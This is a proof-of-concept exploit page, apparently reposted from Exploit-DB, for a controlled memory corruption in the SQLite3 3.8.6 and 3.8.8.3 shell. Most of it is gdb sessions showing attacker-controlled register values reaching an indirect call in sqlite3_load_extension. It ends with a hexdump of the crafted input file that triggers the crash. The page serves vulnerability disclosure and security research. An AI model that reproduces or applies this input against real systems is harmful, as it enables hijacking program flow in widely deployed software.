SQLite3 3.8.6 – Controlled Memory Corruption (PoC)

  • 作者: Andras Kabai
    日期: 2015-02-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/36190/
  • # Exploit Title: SQLite3 controlled memory corruption PoC (0day)
    # Date: [date]
    # Exploit Author: Andras Kabai
    # Vendor Homepage: http://www.sqlite.org/
    # Software Link: http://www.sqlite.org/download.html
    # Version: 3.8.6, 3.8.8.3
    # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
    
    Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.
    
    The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.
    
    ====
    
    andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
    /usr/bin/sqlite3
    andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
    3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
    andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
    GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
    Copyright (C) 2014 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
    (gdb) set disassembly-flavor intel
    (gdb) set args < sqlitepoc.txt
    (gdb) r
    Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
    warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
    
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Usage: .trace FILE|off
    Error: near line 4: near "whatever": syntax error
    Usage: .trace FILE|off
    
    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
    (gdb) i r
    rax0x138	312
    rbx0x41414141424242	18367622009733698
    rcx0x7fffffffb590	140737488336272
    rdx0x0	0
    rsi0x555555779b43	93824994483011
    rdi0x41414141424242	18367622009733698
    rbp0x555555779b43	0x555555779b43
    rsp0x7fffffffb4c0	0x7fffffffb4c0
    r8 0x555555779b41	93824994483009
    r9 0x6c	108
    r100x0	0
    r110x0	0
    r120x555555779b48	93824994483016
    r130x7fffffffb590	140737488336272
    r140x555555779b40	93824994483008
    r150x2	2
    rip0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
    eflags 0x10246	[ PF ZF IF RF ]
    cs 0x33	51
    ss 0x2b	43
    ds 0x0	0
    es 0x0	0
    fs 0x0	0
    gs 0x0	0
    (gdb) disas $rip,+10
    Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
    => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call QWORD PTR [rbx+0x48]
     0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	movr15,rax
     0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	learax,[rip+0x12bc1]# 0x7ffff7bb326e
    End of assembler dump.
    
    ===
    
    andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
    3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
    andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
    GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
    Copyright (C) 2014 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from ./lt-sqlite3...done.
    (gdb) set disassembly-flavor intel
    (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
    (gdb) r
    Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
    warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
    
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Usage: .trace FILE|off
    Error: near line 4: near "whatever": syntax error
    Usage: .trace FILE|off
    
    Program received signal SIGSEGV, Segmentation fault.
    sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
    36169	}
    (gdb) i r
    rax0x138	312
    rbx0x41414141424242	18367622009733698
    rcx0x7fffffffb510	140737488336144
    rdx0x0	0
    rsi0x6261c3	6447555
    rdi0x41414141424242	18367622009733698
    rbp0x6261c3	0x6261c3
    rsp0x7fffffffb440	0x7fffffffb440
    r8 0x6261c1	6447553
    r9 0x6c	108
    r100x7fffffffb270	140737488335472
    r110x7ffff7b5ae50	140737349267024
    r120x6261c8	6447560
    r130x7fffffffb510	140737488336144
    r140x6261c0	6447552
    r150x2	2
    rip0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
    eflags 0x10246	[ PF ZF IF RF ]
    cs 0x33	51
    ss 0x2b	43
    ds 0x0	0
    es 0x0	0
    fs 0x0	0
    gs 0x0	0
    (gdb) disas $rip,+10
    Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
    => 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call QWORD PTR [rbx+0x48]
     0x00007ffff7b5b133 <sqlite3_load_extension+739>:	movr15,rax
     0x00007ffff7b5b136 <sqlite3_load_extension+742>:	learax,[rip+0x587d8]# 0x7ffff7bb3915
    End of assembler dump.
    
    ====
    
    andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
    000000003b 0a 2e 74 20 78 0a 2e74 0a 77 68 61 74 65 76|;..t x..t.whatev|
    0000001065 72 00 0a 3b 0a 2e 740a 2e 6f 70 0a 2e 6c 20|er..;..t..op..l |
    0000002043 43 43 43 42 42 42 4241 41 41 41 0a |CCCCBBBBAAAA.|
    0000002d